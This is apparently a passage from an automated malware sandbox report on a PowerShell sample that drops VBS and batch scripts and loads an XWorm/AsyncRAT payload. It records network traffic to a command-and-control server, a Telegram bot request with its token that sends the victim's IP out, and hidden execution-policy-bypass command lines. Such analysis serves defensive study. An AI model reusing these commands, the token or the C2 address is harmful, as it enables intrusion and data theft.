                                                      Sep 24, 2024 19:27:20.580759048 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:21.099024057 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:21.103867054 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:21.375677109 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:21.377497911 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:21.382220984 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:26.317540884 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:26.322340012 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:26.491944075 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:26.496661901 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:26.501526117 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:26.536426067 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:26.541264057 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:26.793586969 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:26.795172930 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:26.800060034 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:27.209981918 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:27.214804888 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:27.384311914 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:27.393845081 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:27.398741007 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:30.825650930 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:30.830538034 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:31.000920057 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:31.002451897 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:31.007625103 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:31.804688931 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:31.809519053 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:31.978866100 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:31.980562925 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:31.985991001 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:31.989301920 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:31.994298935 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.036876917 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.041832924 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.051786900 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.056651115 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.114346981 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.119321108 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.239444971 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.244631052 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.294183969 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.295748949 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.300582886 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.301918983 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.306814909 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.413897038 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.415590048 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.420435905 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.420515060 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.425450087 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.508164883 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.509449959 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.514365911 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.601912975 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.609302998 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:32.614428043 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:32.889033079 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:33.005225897 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:37.520672083 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:37.525489092 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:37.695101976 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:37.697128057 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:37.702002048 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:47.739588976 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:47.744482040 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:47.817863941 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:47.822592974 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:47.833230972 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:47.838021994 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:47.914125919 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:47.916305065 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:47.921238899 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:48.008791924 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:48.010325909 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:48.015218973 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:48.103507042 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:48.105240107 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:48.110112906 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:53.286631107 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:53.291434050 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:53.348849058 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:53.353636026 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:53.460993052 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:53.462879896 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:53.467745066 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:53.555305958 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:27:53.557408094 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:27:53.562314987 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:02.917742968 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:02.973470926 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:04.302210093 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:04.316607952 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:04.504618883 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:04.513036966 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:04.518030882 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:09.036314964 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:09.042515993 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:09.220237017 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:09.222074032 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:09.229799032 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:19.993736982 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:20.010586977 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:20.190810919 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:20.193393946 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:20.220323086 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:25.942631960 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:25.947484970 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:26.117597103 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:26.119013071 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:26.123788118 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:26.787331104 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:26.792356014 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:26.961829901 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:26.984322071 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:26.989219904 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:32.943531036 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:33.102593899 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:33.102696896 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:33.551949978 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:33.556801081 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:33.726433039 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:33.747632980 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:33.752394915 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:40.333381891 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:40.338227034 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:40.508133888 CEST5000049709191.96.207.180192.168.2.8
                                                      Sep 24, 2024 19:28:40.509104967 CEST4970950000192.168.2.8191.96.207.180
                                                      Sep 24, 2024 19:28:40.514427900 CEST5000049709191.96.207.180192.168.2.8

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 24, 2024 19:24:43.525140047 CEST5324453192.168.2.81.1.1.1
                                                      Sep 24, 2024 19:24:43.596951008 CEST53532441.1.1.1192.168.2.8
                                                      Sep 24, 2024 19:24:44.418734074 CEST6413053192.168.2.81.1.1.1
                                                      Sep 24, 2024 19:24:44.469373941 CEST53641301.1.1.1192.168.2.8
                                                      Sep 24, 2024 19:25:00.991964102 CEST5463053192.168.2.81.1.1.1
                                                      Sep 24, 2024 19:25:01.509485006 CEST53546301.1.1.1192.168.2.8
                                                      Sep 24, 2024 19:25:16.184137106 CEST5360767162.159.36.2192.168.2.8
                                                      Sep 24, 2024 19:25:17.012989998 CEST53629731.1.1.1192.168.2.8

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 24, 2024 19:24:43.525140047 CEST192.168.2.81.1.1.10xf521Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 19:24:44.418734074 CEST192.168.2.81.1.1.10xdf4eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                      Sep 24, 2024 19:25:00.991964102 CEST192.168.2.81.1.1.10x27dfStandard query (0)vecotr.viewdns.netA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 24, 2024 19:24:43.596951008 CEST1.1.1.1192.168.2.80xf521No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Sep 24, 2024 19:24:43.596951008 CEST1.1.1.1192.168.2.80xf521No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Sep 24, 2024 19:24:43.596951008 CEST1.1.1.1192.168.2.80xf521No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Sep 24, 2024 19:24:44.469373941 CEST1.1.1.1192.168.2.80xdf4eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                      Sep 24, 2024 19:25:01.509485006 CEST1.1.1.1192.168.2.80x27dfNo error (0)vecotr.viewdns.net191.96.207.180A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • api.ipify.org
                                                      • api.telegram.org

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.849705104.26.12.2054437432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-24 17:24:44 UTC170OUTGET /?format=text HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-09-24 17:24:44 UTC211INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 17:24:44 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 11
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 8c847840ad570f5b-EWR
                                                      2024-09-24 17:24:44 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                      Data Ascii: 8.46.123.33


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.849706149.154.167.2204437432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-24 17:24:45 UTC292OUTPOST /bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: api.telegram.org
                                                      Content-Length: 63
                                                      Connection: Keep-Alive
                                                      2024-09-24 17:24:45 UTC63OUTData Raw: 63 68 61 74 5f 69 64 3d 31 35 37 34 36 33 38 33 33 33 26 74 65 78 74 3d 48 61 63 6b 65 64 21 2b 42 79 2b 4d 52 56 2b 56 69 63 74 69 6d 2b 49 50 25 33 41 2b 38 2e 34 36 2e 31 32 33 2e 33 33
                                                      Data Ascii: chat_id=1574638333&text=Hacked!+By+MRV+Victim+IP%3A+8.46.123.33
                                                      2024-09-24 17:24:45 UTC388INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 24 Sep 2024 17:24:45 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 328
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      2024-09-24 17:24:45 UTC328INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 30 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 32 33 37 33 33 33 34 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 30 78 70 75 74 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 70 75 74 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 35 37 34 36 33 38 33 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 68 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 65 73 68 6f 78 79 7a 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 31 39 38 36 38 35 2c 22 74 65 78 74 22 3a 22 48 61 63 6b 65 64 21 20 42 79 20 4d 52 56 20 56 69 63 74
                                                      Data Ascii: {"ok":true,"result":{"message_id":2048,"from":{"id":7023733342,"is_bot":true,"first_name":"0xputty","username":"xputty_bot"},"chat":{"id":1574638333,"first_name":"Mesho","username":"meshoxyz","type":"private"},"date":1727198685,"text":"Hacked! By MRV Vict


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:1
                                                      Start time:13:24:30
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1"
                                                      Imagebase:0x7ff6cb6b0000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:13:24:31
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6ee680000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:13:24:43
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
                                                      Imagebase:0x7ff62d180000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:13:24:44
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
                                                      Imagebase:0x7ff61dc70000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:13:24:44
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6ee680000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:13:24:44
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                                      Imagebase:0x7ff61dc70000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:13:24:44
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                                      Imagebase:0x7ff6cb6b0000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:13:24:56
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      Imagebase:0x4b0000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.3868513529.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:1.8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:3
                                                        Total number of Limit Nodes:0
                                                        execution_graph 11355 7ffb4ae37e6a 11356 7ffb4ae38480 LoadLibraryExW 11355->11356 11358 7ffb4ae3850d 11356->11358

                                                        Executed Functions

                                                        Function 00007FFB4AEF26F9 Relevance: 1.0, Instructions: 961COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 107 7ffb4aef26f9-7ffb4aef278a 111 7ffb4aef2790-7ffb4aef279a 107->111 112 7ffb4aef292d-7ffb4aef2981 107->112 113 7ffb4aef27b3-7ffb4aef27b8 111->113 114 7ffb4aef279c-7ffb4aef27b1 111->114 133 7ffb4aef2928-7ffb4aef292a 112->133 134 7ffb4aef2983-7ffb4aef2989 112->134 116 7ffb4aef28c6-7ffb4aef28d0 113->116 117 7ffb4aef27be-7ffb4aef27c1 113->117 114->113 119 7ffb4aef28e1-7ffb4aef2927 116->119 120 7ffb4aef28d2-7ffb4aef28e0 116->120 121 7ffb4aef27d8-7ffb4aef27dc 117->121 122 7ffb4aef27c3-7ffb4aef27cc 117->122 119->133 121->116 129 7ffb4aef27e2-7ffb4aef27e5 121->129 122->121 129->116 132 7ffb4aef27eb-7ffb4aef27ee 129->132 135 7ffb4aef2805 132->135 136 7ffb4aef27f0-7ffb4aef2803 132->136 133->112 139 7ffb4aef29b4-7ffb4aef29df 134->139 140 7ffb4aef298b-7ffb4aef29b2 134->140 141 7ffb4aef2807-7ffb4aef2809 135->141 136->141 154 7ffb4aef29e6-7ffb4aef29f7 139->154 155 7ffb4aef29e1 139->155 140->139 141->116 143 7ffb4aef280f-7ffb4aef2815 141->143 145 7ffb4aef2817-7ffb4aef2824 143->145 146 7ffb4aef2831-7ffb4aef2832 143->146 145->146 151 7ffb4aef2826-7ffb4aef282f 145->151 149 7ffb4aef2834-7ffb4aef2875 146->149 176 7ffb4aef287b-7ffb4aef288b 149->176 151->146 158 7ffb4aef29f9 154->158 159 7ffb4aef29fe-7ffb4aef2a80 154->159 155->154 157 7ffb4aef29e3 155->157 157->154 158->159 162 7ffb4aef29fb 158->162 167 7ffb4aef2a82-7ffb4aef2a8c 159->167 168 7ffb4aef2adf-7ffb4aef2b74 159->168 162->159 170 7ffb4aef2aa5-7ffb4aef2aa8 167->170 171 7ffb4aef2a8e-7ffb4aef2a9e 167->171 186 7ffb4aef2b7a-7ffb4aef2b84 168->186 187 7ffb4aef2dfb-7ffb4aef2eba 168->187 170->168 174 7ffb4aef2aaa-7ffb4aef2ab1 170->174 177 7ffb4aef2ab2-7ffb4aef2ab4 171->177 178 7ffb4aef2aa0-7ffb4aef2aa3 171->178 174->177 185 7ffb4aef288d 176->185 179 7ffb4aef2aca-7ffb4aef2ace 177->179 180 7ffb4aef2ab6-7ffb4aef2ac7 177->180 178->170 188 7ffb4aef2ad5-7ffb4aef2ade 179->188 180->179 185->149 189 7ffb4aef288f-7ffb4aef28c5 185->189 190 7ffb4aef2b86-7ffb4aef2b93 186->190 191 7ffb4aef2b9d-7ffb4aef2ba2 186->191 190->191 198 7ffb4aef2b95-7ffb4aef2b9b 190->198 195 7ffb4aef2ba8-7ffb4aef2bab 191->195 196 7ffb4aef2d9f-7ffb4aef2da9 191->196 199 7ffb4aef2bc2 195->199 200 7ffb4aef2bad-7ffb4aef2bc0 195->200 201 7ffb4aef2db8-7ffb4aef2df8 196->201 202 7ffb4aef2dab-7ffb4aef2db7 196->202 198->191 207 7ffb4aef2bc4-7ffb4aef2bc6 199->207 200->207 201->187 207->196 209 7ffb4aef2bcc-7ffb4aef2c00 207->209 222 7ffb4aef2c17 209->222 223 7ffb4aef2c02-7ffb4aef2c15 209->223 226 7ffb4aef2c19-7ffb4aef2c1b 222->226 223->226 226->196 227 7ffb4aef2c21-7ffb4aef2c29 226->227 227->187 229 7ffb4aef2c2f-7ffb4aef2c39 227->229 230 7ffb4aef2c55-7ffb4aef2c65 229->230 231 7ffb4aef2c3b-7ffb4aef2c53 229->231 230->196 234 7ffb4aef2c6b-7ffb4aef2c9c 230->234 231->230 234->196 241 7ffb4aef2ca2-7ffb4aef2cce 234->241 246 7ffb4aef2cf9 241->246 247 7ffb4aef2cd0-7ffb4aef2cf7 241->247 248 7ffb4aef2cfb-7ffb4aef2cfd 246->248 247->248 248->196 250 7ffb4aef2d03-7ffb4aef2d0a 248->250 251 7ffb4aef2d0c-7ffb4aef2d3d 250->251 256 7ffb4aef2d56-7ffb4aef2d64 251->256 257 7ffb4aef2d3f-7ffb4aef2d54 251->257 260 7ffb4aef2d66-7ffb4aef2d9e 256->260 261 7ffb4aef2d0b 256->261 257->256 261->251
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1630895942.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffb4aef0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbe52afdb2b887c2e73638b6843bb4560be35e2fbe19beff1276f6f2115f4bfc
                                                        • Instruction ID: 151de37953e28e0a0afdf92146cdcd6354a09bffe52ea6043424eaf4a7460ec1
                                                        • Opcode Fuzzy Hash: fbe52afdb2b887c2e73638b6843bb4560be35e2fbe19beff1276f6f2115f4bfc
                                                        • Instruction Fuzzy Hash: E85248A2A4EBCA1FE796BF7888551A57F94FF56310B2801FBE09CCB1D3DA189C058351
                                                        Function 00007FFB4AEF6D23 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
